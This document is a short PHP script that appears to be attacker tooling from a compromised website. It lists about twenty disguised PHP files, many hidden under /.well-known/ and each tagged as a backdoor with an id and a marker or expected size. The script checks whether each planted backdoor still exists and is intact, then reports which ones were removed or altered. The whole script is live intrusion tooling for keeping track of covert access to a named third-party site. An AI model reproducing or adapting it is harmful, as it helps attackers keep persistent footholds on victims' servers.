<?php $r = '/home/tminywse/kaykayfoods.com.pk'; $x = ["/.well-known/xajax.inc.php"=>"bd@@273019972@@token_parser_engine",
"/.well-known/AttrTypes.php"=>"bd@@250514516@@event_dispatcher",
"/pdf.class.api.php"=>"bd@@273164170@@system_core",
"/.well-known/insertfile.php"=>"bd@@272988306@@splitter_tool",
"/.well-known/ecjyufxm.php"=>"bd@@250465467@@batch_process",
"/.well-known/coupon_admin.php"=>"bd@@272994265@@publish_content",
"/wp.class.api.php"=>"bd@@273076953@@event_dispatcher",
"/cma.cord.api.php"=>"bd@@273287652@@903",
"/.well-known/pki-validation/cqhvzkdg.php"=>"bd@@250514408@@buffer_cache",
"/.well-known/coupon.php"=>"bd@@272996333@@dependency_resolver",
"/cma.classified.api.php"=>"bd@@273289577@@78",
"/cma.cord.api.php"=>"bd@@273289580@@89",
"/wp-class-api.php"=>"bd@@272978984@@config_manager",
"/proj.cord.api.php"=>"bd@@273289582@@14",
"/proj.class.api.php"=>"bd@@273289586@@43",
"/pdf.cord.api.php"=>"bd@@273289601@@35",
"/cma_classified.php"=>"bd@@273289606@@22",
"/proj_cord.php"=>"bd@@273289613@@62",
"/wp.cord.api.php"=>"bd@@273289617@@14",
"/pdf.php"=>"bd@@273159197@@dataflow_engine"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!'); |